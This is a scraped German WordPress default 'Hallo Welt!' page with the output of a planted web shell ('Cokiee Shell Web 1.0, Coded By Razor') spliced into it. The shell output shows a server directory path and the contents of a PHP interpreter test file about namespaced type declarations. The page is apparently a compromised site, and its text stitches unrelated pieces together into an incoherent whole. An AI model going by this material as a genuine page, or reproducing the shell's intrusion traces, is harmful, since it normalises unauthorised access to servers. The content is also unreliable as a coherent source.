Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/Zend/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/Zend/tests/bug62441.phpt |
--TEST-- Bug #62441: Incorrect strong typing in namespaced child classes --FILE-- <?php namespace { interface Iface { function method(stdClass $o); } } namespace ns { class Foo implements \Iface { function method(stdClass $o) { } } (new Foo)->method(new \stdClass); } ?> --EXPECTF-- Fatal error: Declaration of ns\Foo::method(ns\stdClass $o) must be compatible with Iface::method(stdClass $o) in %s on line %d
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare